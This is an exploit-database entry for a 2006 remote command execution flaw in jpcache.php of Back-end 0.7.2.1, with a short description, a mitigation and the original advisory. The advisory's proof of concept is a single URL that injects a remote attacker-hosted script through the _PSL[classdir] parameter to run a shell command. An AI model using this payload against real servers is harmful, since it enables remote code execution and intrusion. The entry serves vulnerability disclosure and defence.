header-logo
Suggest Exploit
vendor:
N/A
by:
Federico Fazzi
7.5
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: N/A
Affected Version From: 0.7.2.1
Affected Version To: 0.7.2.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Back-end = 0.7.2.1 (jpcache.php) Remote command execution

Back-end have a default path pre-set on jpcache.php, and cracker can execute a remote command.

Mitigation:

Ensure that the default path is not set in jpcache.php and that all user input is properly validated.
Source

Exploit-DB raw data:

# Federico Fazzi, <federico@autistici.org>
# Back-end = 0.7.2.1 (jpcache.php) Remote command execution
# 08/06/2006 1:04
# Bug:
#
# jpcache.php: line 40
#
# ---
# $includedir = $_PSL['classdir'] . "/jpcache";
# ---
#
# Proof of concept:
#
# Back-end have a default path pre-set on jpcache.php,
# and cracker can execute a remote command.
#
# http://example/[be_path]/class/jpcache/jpcache.php?_PSL[classdir]=http://example/cmd.php?exec=uname

# milw0rm.com [2006-06-08]

Navigation

Suggest Exploit

Services By CQR